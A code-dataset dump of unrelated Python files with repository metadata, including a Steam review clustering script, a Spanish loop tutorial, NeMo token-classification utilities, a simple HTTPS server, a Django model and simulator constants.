for (cluster_count, cluster_iter) in enumerate(top_clusters):
ind = cluster_centers_indices[int(cluster_iter)]
review_id = list(df["recommendationid"])[ind]
review_content = get_review_content(app_id, review_id)
# Reference: https://stackoverflow.com/a/18544440
print("\n ==== Cluster " + chr(cluster_count + 65) + " (#reviews = " + str(
summary_labels[cluster_count]) + ") ====")
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def print_sentiment_analysis(text):
blob = TextBlob(text)
print('=> Sentiment analysis: '
+ 'polarity({0:.2f})'.format(blob.sentiment.polarity) + ' ; '
+ 'subjectivity({0:.2f})'.format(blob.sentiment.subjectivity) + ')')
return
def show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels=None,
max_num_reviews_to_print=None):
# The provided labels can be supplied directly to override the labels found with Affinity Propagation.
# Typically used to show results obtained with other clustering methods.
# You can display a given number of reviews per cluster by playing with the variable max_num_reviews_to_print.
if provided_labels is None:
provided_labels = []
if (provided_labels is None) or len(provided_labels) == 0:
labels = af.labels_
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(af)
else:
labels = provided_labels
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(None, provided_labels)
cluster_index = int(list_of_clusters_by_count[cluster_count])
if af is not None:
cluster_centers_indices = af.cluster_centers_indices_
cluster_representative_ind = cluster_centers_indices[cluster_index]
else:
# noinspection PyUnusedLocal
cluster_centers_indices = None
cluster_representative_ind = None
cluster_content_indices = [i for i, x in enumerate(list(labels)) if x == cluster_index]
for (review_count, ind) in enumerate(cluster_content_indices):
review_id = list(df["recommendationid"])[ind]
review_content = get_review_content(app_id, review_id)
if (cluster_representative_ind is not None) and (ind == cluster_representative_ind):
info_str = " (representative)"
else:
info_str = ""
if (max_num_reviews_to_print is not None) and (review_count >= max_num_reviews_to_print):
break
# Reference: https://stackoverflow.com/a/18544440
print("\n ==== Review " + str(review_count + 1) + info_str + " in cluster " + chr(
cluster_count + 65) + " (#reviews = " + str(summary_labels[cluster_count]) + ") ====")
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def show_all_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels=None):
if provided_labels is None:
provided_labels = []
show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels)
return
def show_data_frame_for_cluster_centers(df, af, num_top_clusters=None, verbose=True):
cluster_centers_indices = af.cluster_centers_indices_
# labels = af.labels_
(_, list_of_clusters_by_count) = get_top_clusters_by_count(af)
sorted_cluster_centers_indices = cluster_centers_indices[[int(i) for i in list_of_clusters_by_count]]
# Reference: https://stackoverflow.com/a/19155860
df_representative = df.iloc[sorted_cluster_centers_indices, :]
if verbose:
if num_top_clusters is None:
print(df_representative)
else:
print(df_representative.iloc[0:num_top_clusters, :])
return df_representative
# noinspection PyPep8Naming
def try_affinity_propagation(app_id, df, X, num_top_clusters=4, verbose=False):
# #############################################################################
# Compute Affinity Propagation
af = AffinityPropagation().fit(X)
cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
# Show reviews used as cluster centers (for all clusters)
show_representative_reviews(app_id, df, af)
# Print additional info
n_clusters_ = len(cluster_centers_indices)
print('\nEstimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels, metric='sqeuclidean'))
# Show reviews used as cluster centers of the top clusters
show_representative_reviews(app_id, df, af, num_top_clusters, verbose)
# Show all reviews in given cluster (to manually check for cluster homogeneity)
if verbose:
cluster_count = 1 # Warning: this starts at 0
show_all_reviews_from_given_cluster(app_id, df, af, cluster_count)
# Show dataframe limited to cluster centers
_ = show_data_frame_for_cluster_centers(df, af, num_top_clusters)
return labels
# noinspection PyPep8Naming
def try_birch(app_id, df, X, num_clusters_input=3, num_reviews_to_show_per_cluster=3):
# #############################################################################
# Compute Agglomerative Clustering with Birch as a first step
brc = Birch(branching_factor=50, n_clusters=num_clusters_input, threshold=0.5, compute_labels=True)
brc_labels = brc.fit_predict(X)
# Show Birch results
for cluster_count in range(num_clusters_input):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, brc_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, brc_labels, True)
return brc_labels
# noinspection PyPep8Naming
def try_agglomerative_clustering(app_id, df, X, num_clusters_input=3, num_reviews_to_show_per_cluster=3,
linkage='ward', use_connectivity=True):
# #############################################################################
# Compute Agglomerative Clustering without Birch
# NB: linkage can be any of these: 'average', 'complete', 'ward'
if use_connectivity:
knn_graph = kneighbors_graph(X, 30, include_self=False)
connectivity = knn_graph # one of these: None or knn_graph
else:
connectivity = None
model = AgglomerativeClustering(linkage=linkage, connectivity=connectivity, n_clusters=num_clusters_input)
agg_labels = model.fit_predict(X)
# Show Agglomerative Clustering results
for cluster_count in range(num_clusters_input):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, agg_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, agg_labels, True)
return agg_labels
# noinspection PyPep8Naming
def try_dbscan(app_id, df, X, db_eps=0.3, db_min_samples=10, num_reviews_to_show_per_cluster=3):
# #############################################################################
# Compute DBSCAN
# Caveat: It does not seem to be super easy to find adequate parameters.
# For Fidel Dungeon Rescue, the following allows to at least return a few different clusters:
# db_eps = 40
# db_min_samples = 4
db = DBSCAN(eps=db_eps, min_samples=db_min_samples).fit(X)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
dbscan_labels = db.labels_
num_clusters_including_noise_cluster = len(set(dbscan_labels))
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = num_clusters_including_noise_cluster - (1 if -1 in dbscan_labels else 0)
print('Estimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, dbscan_labels))
# Show DBSCAN results
for cluster_count in range(num_clusters_including_noise_cluster):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, dbscan_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, dbscan_labels, True)
return dbscan_labels
def test_every_clustering_method(app_id):
# Clustering
# Reference: http://scikit-learn.org/stable/modules/clustering.html
# NB: We are not interested in outlier detection:
# - if the goal were to remove low-quality reviews, a threshold on review lenght should be sufficient,
# - for some games, the low-quality/"funny meme" reviews are not outliers, they constitute their own sizable cluster
# Features (columns) to exclude
excluded_columns = ["language", "recommendationid"]
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df, excluded_columns)
# Demo of every clustering method
# Affinity Propagation
# NB: The clusters look consistent, I like the results, but:
# - there are too many clusters (11) for our application,
# - and there is no direct control of the number of clusters.
# I don't want to have to look at each cluster to find one-line joke reviews, so I prefer to go with another method.
num_top_clusters = 4
verbose = True
try_affinity_propagation(app_id, df, X, num_top_clusters, verbose)
# Agglomerative Clustering with Birch
num_clusters_input = 3
num_reviews_to_show_per_cluster = 3
try_birch(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster)
# Agglomerative Clustering without Birch
# NB: With some parameters, results are similar to Birch's (as expected from scikit-learn documentation of Birch).
linkage = 'ward'
use_connectivity = True
try_agglomerative_clustering(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster, linkage,
use_connectivity)
# DBSCAN
# NB: Not satisfactory here. Either the parameters, or the data pre-processing, should be changed for DBSCAN.
db_eps = 40
db_min_samples = 4
try_dbscan(app_id, df, X, db_eps, db_min_samples, num_reviews_to_show_per_cluster)
return
def apply_affinity_propagation(app_id, num_reviews_to_show_per_cluster=3):
# Cluster reviews for app_id using Affinity Propagation
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df)
af = AffinityPropagation().fit(X)
cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
# Show reviews used as cluster centers (for all clusters)
show_representative_reviews(app_id, df, af)
# Print additional info
n_clusters_ = len(cluster_centers_indices)
print('\nEstimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels, metric='sqeuclidean'))
# Show Affinity Propagation results
for cluster_count in range(n_clusters_):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, labels, True)
return df, labels
def apply_birch(app_id, num_clusters_input=3, num_reviews_to_show_per_cluster=3):
# Cluster reviews for app_id using selected method (Birch and then Agglomerative Clustering)
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df)
brc_labels = try_birch(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster)
return df, brc_labels
def main(argv):
app_id_list = ["723090", "639780", "573170"]
if len(argv) == 0:
app_id = app_id_list[-1]
print("No input detected. AppID automatically set to " + app_id)
else:
app_id = argv[0]
print("Input appID detected as " + app_id)
num_reviews_to_show_per_cluster = 3 # Set to None to show all the reviews
apply_birch_method = True
if apply_birch_method:
# Apply Birch and then Agglomerative Clustering
num_clusters_input = 3
(_, _) = apply_birch(app_id, num_clusters_input, num_reviews_to_show_per_cluster)
else:
# Apply Affinity Propagation
(_, _) = apply_affinity_propagation(app_id, num_reviews_to_show_per_cluster)
# Demo of every clustering method
perform_full_test_suite = False
if perform_full_test_suite:
test_every_clustering_method(app_id)
return True
if __name__ == "__main__":
main(sys.argv[1:])
| [
"woctezuma@users.noreply.github.com"
] | woctezuma@users.noreply.github.com |
178b791256772b51daf76b2092c025e4e218ef8b | 09aff11fe5ccac7548d49db3a92803675117eaf3 | /BackEnd/Semana3/Dia4/02-condicionales.py | 92c0a9f066e137b627daaad228c770f8130984cb | [] | no_license | jorgegarba/CodiGo8 | 4defe235a790ebc248f9278f18ca050fde6c195f | f22b2b405ad999e5b960ce5f52936cd4e472af35 | refs/heads/master | 2023-01-09T02:14:27.134870 | 2020-03-18T03:15:52 | 2020-03-18T03:15:52 | 211,871,983 | 4 | 1 | null | 2023-01-07T22:11:22 | 2019-09-30T13:54:52 | JavaScript | UTF-8 | Python | false | false | 1,638 | py | # condiciona if else elif
a = 3
b = 4
# print(a > b)
# if (a > b):
# print("a es mayor que b")
# else:
# print("b es mayor que a")
# elif -> verifica esta otra condicion a ver si
# es correcta, tiene que ir antes de el else
num = 8
# if(num>0):
# print("Es un numero positivo")
# elif (num==0):
# print("Es cero")
# else:
# print("Es negativo")
# for -> es usado para iterar sobre una secuencia
# de elementos
cadena = "Buenos dias"
# for letra in cadena:
# print(letra,end="\n")
# for (let i=0 ; i<10; i++)
# for i in range(0,10,3):
# print(i)
# break -> para parar el bucle
# for numero in range(0,10):
# if(numero==5):
# break
# print(numero)
# continue -> para parar SOLO la iteraccion actual
# for numero in range(10):
# if(numero==6):
# continue
# print(numero)
# for doble
# for numero1 in range(4):
# for numero2 in range(3):
# print(numero1,numero2)
#
# while -> un bucle infinito de acciones mientras sea cierta la condicion
valor = 1
fin = 10
# while(valor<fin):
# print(valor)
# valor += 1 # valor ++
# pass -> no hace nada, solo indica que pase a la siguiente iteracion
# Ejercicio: que de una lista de numeros
numeros = [1,2,3,4,5,6,7,8,9]
#guarde todos los pares en la lista numeros_pares y los impares en la lista
# numeros_impares y que muestre las listas y la lista de numeros debe quedar vacia
numeros_pares=[]
numeros_impares=[]
for numero in numeros:
if(numero%2==0):
numeros_pares.append(numero)
else:
numeros_impares.append(numero)
print(numeros_pares)
print(numeros_impares)
numeros.clear()
print(numeros)
| [
"ederiveroman@gmail.com"
] | ederiveroman@gmail.com |
e6e492a0ce1247655b69757dedda44645ef50458 | 0fba29dd8bb4e8e6a5d12b54d8f09d5b5c835576 | /23_personal/test.py | 143a4fd013f75e1d07534c24c9c78ee0f8d1ff23 | [] | no_license | buxuele/100-days-of-code | 4d37ab955d0cd463a1dd40ca298dac710c84237d | 58c326aca1425911a6979b1a9e305e0a3ed1b0d4 | refs/heads/master | 2020-04-25T23:10:22.816754 | 2019-05-11T01:00:21 | 2019-05-11T01:00:21 | 173,136,028 | 0 | 0 | null | 2019-04-11T20:42:42 | 2019-02-28T15:22:08 | HTML | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/python3
# Time: 2019/04/24 10:19 PM
# \u7f8a\u7531\u5927\u4e95\592b\u5927\u4eba\u738b\u4e2d\u5de5
import codecs
gg = '\346\203\263\347\234\213\346\255\243\351\235\242\357\274\237\351\202\243\345\260\261\350\246\201\347\234\213\344\273\224\347\273\206\344\272\206\357\274\201'.encode("utf-8")
print(type(gg))
# a = codecs.decode(gg, "")
# print(a)
| [
"baogebuxuele@163.com"
] | baogebuxuele@163.com |
d80766c27a44af916ff6ef4330c81821db07f418 | b9fdfa1ad9315f54f198ab7d918f59e2c45b95ed | /additional_pipelines_used_in_LIFE/preprocessing_ica_aroma/build/keepalive/keepalive/__init__.py | 65dd57b5cad491357173661182777a54bb457052 | [] | no_license | fBeyer89/LIFE_rs_ICA_preprocessing | 4829e8282b06918aa4e610b26e9e0f0c5545b8b5 | 4868bf2d734d0dab89fc21f876aca400e1de1a5f | refs/heads/master | 2021-01-10T12:09:04.050976 | 2019-04-18T13:05:47 | 2019-04-18T13:05:47 | 44,090,982 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | # -*- coding: utf-8 -*-
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
# This file was part of urlgrabber, a high-level cross-protocol url-grabber
# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko
# Copyright 2015 Sergio Fernández
from keepalive import *
__version__ = "0.5"
| [
"fbeyer@cbs.mpg.de"
] | fbeyer@cbs.mpg.de |
0e5e071104c431a893ca44a126aeda1409c77336 | a045055cb41f7d53e1b103c3655a17dc4cd18d40 | /python-master/kubernetes/test/test_v1_role_list.py | ce35aa97b1362b07e046028323570ffbd4a54b7c | [] | no_license | 18271693176/copy | 22f863b180e65c049e902de0327f1af491736e5a | ff2511441a2df03817627ba8abc6b0e213878023 | refs/heads/master | 2020-04-01T20:20:28.048995 | 2018-11-05T02:21:53 | 2018-11-05T02:21:53 | 153,599,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_role_list import V1RoleList
class TestV1RoleList(unittest.TestCase):
""" V1RoleList unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1RoleList(self):
"""
Test V1RoleList
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_role_list.V1RoleList()
pass
if __name__ == '__main__':
unittest.main()
| [
"906317366@qq.com"
] | 906317366@qq.com |
4bf1b976b01d1825146b5147af5e3ab534fd4d6c | 2dd26e031162e75f37ecb1f7dd7f675eeb634c63 | /nemo/collections/nlp/data/token_classification/token_classification_utils.py | 94acd69d3b11374984fa4e13ef269755039d8c70 | [
"Apache-2.0"
] | permissive | NVIDIA/NeMo | 1b001fa2ae5d14defbfd02f3fe750c5a09e89dd1 | c20a16ea8aa2a9d8e31a98eb22178ddb9d5935e7 | refs/heads/main | 2023-08-21T15:28:04.447838 | 2023-08-21T00:49:36 | 2023-08-21T00:49:36 | 200,722,670 | 7,957 | 1,986 | Apache-2.0 | 2023-09-14T18:49:54 | 2019-08-05T20:16:42 | Python | UTF-8 | Python | false | false | 7,468 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import re
import string
from typing import Dict
from nemo.collections.nlp.data.data_utils.data_preprocessing import (
fill_class_weights,
get_freq_weights,
get_label_stats,
)
from nemo.utils import logging
__all__ = ['get_label_ids', 'create_text_and_labels']
def remove_punctuation(word: str):
"""
Removes all punctuation marks from a word except for '
that is often a part of word: don't, it's, and so on
"""
all_punct_marks = string.punctuation.replace("'", '')
return re.sub('[' + all_punct_marks + ']', '', word)
def create_text_and_labels(output_dir: str, file_path: str, punct_marks: str = ',.?'):
"""
Create datasets for training and evaluation.
Args:
output_dir: path to the output data directory
file_path: path to file name
punct_marks: supported punctuation marks
The data will be split into 2 files: text.txt and labels.txt. \
Each line of the text.txt file contains text sequences, where words\
are separated with spaces. The labels.txt file contains \
corresponding labels for each word in text.txt, the labels are \
separated with spaces. Each line of the files should follow the \
format: \
[WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and \
[LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
"""
if not os.path.exists(file_path):
raise ValueError(f'{file_path} not found')
os.makedirs(output_dir, exist_ok=True)
base_name = os.path.basename(file_path)
labels_file = os.path.join(output_dir, 'labels_' + base_name)
text_file = os.path.join(output_dir, 'text_' + base_name)
with open(file_path, 'r') as f:
with open(text_file, 'w') as text_f:
with open(labels_file, 'w') as labels_f:
for line in f:
line = line.split()
text = ''
labels = ''
for word in line:
label = word[-1] if word[-1] in punct_marks else 'O'
word = remove_punctuation(word)
if len(word) > 0:
if word[0].isupper():
label += 'U'
else:
label += 'O'
word = word.lower()
text += word + ' '
labels += label + ' '
text_f.write(text.strip() + '\n')
labels_f.write(labels.strip() + '\n')
print(f'{text_file} and {labels_file} created from {file_path}.')
def get_label_ids(
label_file: str,
is_training: bool = False,
pad_label: str = 'O',
label_ids_dict: Dict[str, int] = None,
get_weights: bool = True,
class_labels_file_artifact='label_ids.csv',
):
"""
Generates str to int labels mapping for training data or checks correctness of the label_ids_dict
file for non-training files or if label_ids_dict is specified
Args:
label_file: the path of the label file to process
is_training: indicates whether the label_file is used for training
pad_label: token used for padding
label_ids_dict: str label name to int ids mapping. Required for non-training data.
If specified, the check that all labels from label_file are present in label_ids_dict will be performed.
For training data, if label_ids_dict is None, a new mapping will be generated from label_file.
get_weights: set to True to calculate class weights, required for Weighted Loss.
class_labels_file_artifact: name of the file to save in .nemo
"""
if not os.path.exists(label_file):
raise ValueError(f'File {label_file} was not found.')
logging.info(f'Processing {label_file}')
if not is_training and label_ids_dict is None:
raise ValueError(
f'For non training data, label_ids_dict created during preprocessing of the training data '
f'should be provided'
)
# collect all labels from the label_file
data_dir = os.path.dirname(label_file)
unique_labels = set(pad_label)
all_labels = []
with open(label_file, 'r') as f:
for line in f:
line = line.strip().split()
all_labels.extend(line)
unique_labels.update(line)
# check that all labels from label_file are present in the specified label_ids_dict
# or generate label_ids_dict from data (for training only)
if label_ids_dict:
logging.info(f'Using provided labels mapping {label_ids_dict}')
for name in unique_labels:
if name not in label_ids_dict:
raise ValueError(f'{name} class from {label_file} not found in the provided mapping: {label_ids_dict}')
else:
label_ids_dict = {pad_label: 0}
if pad_label in unique_labels:
unique_labels.remove(pad_label)
for label in sorted(unique_labels):
label_ids_dict[label] = len(label_ids_dict)
label_ids_filename = os.path.join(data_dir, class_labels_file_artifact)
if is_training:
with open(label_ids_filename, 'w') as f:
labels, _ = zip(*sorted(label_ids_dict.items(), key=lambda x: x[1]))
f.write('\n'.join(labels))
logging.info(f'Labels mapping {label_ids_dict} saved to : {label_ids_filename}')
# calculate label statistics
base_name = os.path.splitext(os.path.basename(label_file))[0]
stats_file = os.path.join(data_dir, f'{base_name}_label_stats.tsv')
if os.path.exists(stats_file) and not is_training and not get_weights:
logging.info(f'{stats_file} found, skipping stats calculation.')
else:
all_labels = [label_ids_dict[label] for label in all_labels]
logging.info(f'Three most popular labels in {label_file}:')
total_labels, label_frequencies, max_id = get_label_stats(all_labels, stats_file)
logging.info(f'Total labels: {total_labels}. Label frequencies - {label_frequencies}')
if get_weights:
class_weights_pkl = os.path.join(data_dir, f'{base_name}_weights.p')
if os.path.exists(class_weights_pkl):
class_weights = pickle.load(open(class_weights_pkl, 'rb'))
logging.info(f'Class weights restored from {class_weights_pkl}')
else:
class_weights_dict = get_freq_weights(label_frequencies)
logging.info(f'Class Weights: {class_weights_dict}')
class_weights = fill_class_weights(class_weights_dict, max_id)
pickle.dump(class_weights, open(class_weights_pkl, "wb"))
logging.info(f'Class weights saved to {class_weights_pkl}')
else:
class_weights = None
return label_ids_dict, label_ids_filename, class_weights
| [
"noreply@github.com"
] | NVIDIA.noreply@github.com |
ce764895f86745e70087150b9abf4c75d5737670 | 5fe72bb13baf3649058ebe11aa86ad4fc56c69ed | /hard-gists/6194556/snippet.py | b70124de919065b567273fb101936d8671b21e0e | [
"Apache-2.0"
] | permissive | dockerizeme/dockerizeme | 8825fed45ff0ce8fb1dbe34959237e8048900a29 | 408f3fa3d36542d8fc1236ba1cac804de6f14b0c | refs/heads/master | 2022-12-10T09:30:51.029846 | 2020-09-02T13:34:49 | 2020-09-02T13:34:49 | 144,501,661 | 24 | 20 | Apache-2.0 | 2022-11-21T12:34:29 | 2018-08-12T21:21:04 | Python | UTF-8 | Python | false | false | 1,312 | py | '''
SimpleHTTPServerSSL.py - simple HTTP server supporting SSL/TLS. I.e. HTTPS. For python 3.3
- replace CERT and KEY with the location of your .pem server file.
- the default port is 443.
usage: python SimpleHTTPServerSSL.py
based on http://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/
'''
import socket, os
from socketserver import BaseServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import ssl
CERT = 'ssl.crt.pem'
KEY = 'ssl.key.pem'
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
BaseServer.__init__(self, server_address, HandlerClass)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.load_cert_chain(certfile=CERT, keyfile=KEY)
self.socket = ctx.wrap_socket(socket.socket(self.address_family, self.socket_type), server_side=True)
self.server_bind()
self.server_activate()
def test(HandlerClass = SimpleHTTPRequestHandler,
ServerClass = SecureHTTPServer):
server_address = ('', 443) # (address, port)
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print("Serving HTTPS on", sa[0], "port", sa[1], "...")
httpd.serve_forever()
if __name__ == '__main__':
test() | [
"42325807+dockerizeme@users.noreply.github.com"
] | 42325807+dockerizeme@users.noreply.github.com |
0e2625b5eeb8fad171f69a84170920695873a752 | 3c8701e04900389adb40a46daedb5205d479016c | /oldboy-python18/day18-model/day18/cms/cms/app01/models.py | 10494d9551d007fb7aaff17983302a15f712c02e | [] | no_license | huboa/xuexi | 681300653b834eaf506f49987dcca83df48e8db7 | 91287721f188b5e24fbb4ccd63b60a80ed7b9426 | refs/heads/master | 2020-07-29T16:39:12.770272 | 2018-09-02T05:39:45 | 2018-09-02T05:39:45 | 73,660,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from django.db import models
# Create your models here.
class Book(models.Model):
id=models.AutoField(primary_key=True)
title=models.CharField(max_length=32)
pubDate=models.DateField()
price=models.DecimalField(max_digits=6,decimal_places=2)
publish=models.CharField(max_length=32)
| [
"wxcr11@gmail.com"
] | wxcr11@gmail.com |
ed6332db56631c9ab5f726d3b84ed62bdbee475a | b12adda0b77dba851f1a09b92c4553da6333ffaf | /tools/ttn/ttn_constants.py | a98a422d1e567b66e82d1b1ed6ab5664371204a1 | [] | no_license | Vignesh2208/Titan | c9a86e236e150b1de80d5054b48b9bc482d2785b | 3366200b47c6f81fc8cafb449307325f7cf45da0 | refs/heads/master | 2021-06-22T01:58:10.836590 | 2021-04-14T22:31:33 | 2021-04-14T22:31:33 | 213,460,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,155 | py | """Some constants used by ttn application."""
import os
TTN_FOLDER_NAME = '.ttn'
TTN_CONFIG_DIR = f'{os.path.expanduser("~")}/{TTN_FOLDER_NAME}'
PROJECT_NAME_KEY = 'PROJECT_NAME'
PROJECT_SRC_DIR_KEY = 'PROJECT_SRC_DIR'
PROJECT_CLANG_INIT_PARAMS_KEY = 'PROJECT_CLANG_INIT_PARAMS'
PROJECT_CLANG_LOCK_KEY = 'PROJECT_CLANG_LOCK'
PROJECT_ARCH_NAME = 'PROJECT_ARCH_NAME'
PROJECT_ARCH_TIMINGS_PATH_KEY = 'PROJECT_ARCH_TIMINGS_PATH'
BBL_COUNTER_KEY = 'BBL_Counter'
LOOP_COUNTER_KEY = 'Loop_Counter'
NIC_SPEED_MBPS_KEY = 'NIC_SPEED_MBPS'
CPU_CYCLE_NS_KEY = 'CPU_CYCLES_NS'
ROB_SIZE_KEY = 'ROB_SIZE'
DISPATCH_UNITS_KEY = 'DISPATCH_UNITS'
TIMING_MODEL_KEY = 'TIMING_MODEL'
# TODO: For now we only support one level of cache modelling i.e L1 cache
L1_INS_CACHE_SIZE_KEY = 'L1_INS_CACHE_SIZE_KB'
L1_INS_CACHE_LINES_SIZE_KEY = 'L1_INS_CACHE_LINE_SIZE'
L1_INS_CACHE_REPLACEMENT_POLICY_KEY = 'L1_INS_CACHE_REPLACEMENT_POLICY'
L1_INS_CACHE_MISS_CYCLES_KEY = 'L1_INS_CACHE_MISS_CYCLES'
L1_INS_CACHE_ASSOCIATIVITY_KEY = 'L1_INS_CACHE_ASSOCIATIVITY'
L1_DATA_CACHE_SIZE_KEY = 'L1_DATA_CACHE_SIZE_KB'
L1_DATA_CACHE_LINES_SIZE_KEY = 'L1_DATA_CACHE_LINE_SIZE'
L1_DATA_CACHE_REPLACEMENT_POLICY_KEY = 'L1_DATA_CACHE_REPLACEMENT_POLICY'
L1_DATA_CACHE_MISS_CYCLES_KEY = 'L1_DATA_CACHE_MISS_CYCLES'
L1_DATA_CACHE_ASSOCIATIVITY_KEY = 'L1_DATA_CACHE_ASSOCIATIVITY'
DEFAULT_PROJECT_NAME = 'DEFAULT'
DEFAULT_PROJECT_ARCH = 'NONE'
DEFAULT_PROJECT_SRC_DIR = '/tmp'
DEFAULT_NIC_SPEED_MBPS = 1000
# TODO: For now we only support one level of cache modelling i.e L1 cache
# Associativity = 1 <=> Direct-Mapped cache
DEFAULT_L1_INS_CACHE_ASSOCIATIVITY = 8
DEFAULT_L1_INS_CACHE_SIZE_KB = 32
DEFAULT_L1_INS_CACHE_LINE_SIZE_BYTES = 64
DEFAULT_L1_INS_CACHE_REPLACEMENT_POLICY = 'LRU'
DEFAULT_L1_INS_CACHE_MISS_CYCLES = 100
# Associativity = 1 <=> Direct-Mapped cache
DEFAULT_L1_DATA_CACHE_ASSOCIATIVITY = 8
DEFAULT_L1_DATA_CACHE_SIZE_KB = 32
DEFAULT_L1_DATA_CACHE_LINE_SIZE_BYTES = 64
DEFAULT_L1_DATA_CACHE_REPLACEMENT_POLICY = 'LRU'
DEFAULT_L1_DATA_CACHE_MISS_CYCLES = 100
DEFAULT_ROB_SIZE = 1024
DEFAULT_NUM_DISPATCH_UNITS = 8
DEFAULT_TIMING_MODEL = 'EMPIRICAL'
NO_ARCH = 'ARCH_NONE'
| [
"vig2208@gmail.com"
] | vig2208@gmail.com |
7240b19f703621f84a9c3c19e6eaa79a91bd1429 | c29f7a8c6c9fae126bdef6c43bd1a1e2ebbaf556 | /day16/myarray.py | 4dfce1a910a5d5eaf8471d0c22ce2f43e850dad3 | [] | no_license | wnsgur5303/EducatedPython | 8c95746d821ea2842e624de3ee3e06f5d3ac6416 | bbd956807c3efcff8a4129a9eefa901475b49797 | refs/heads/master | 2023-04-06T18:17:40.914066 | 2021-04-15T07:31:12 | 2021-04-15T07:31:12 | 358,161,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | arr = [1,2,3,4,5]
print(arr[3:])
print(arr[:3]) | [
"wnsgur5303@gmail.com"
] | wnsgur5303@gmail.com |
d06972574b5df6446365a0de414d5d4a6a78d0d2 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/securitydevops/azure-mgmt-securitydevops/generated_samples/azure_dev_ops_org_get.py | 40d2f4d019e8bc017523654781724c90fb9e4c69 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
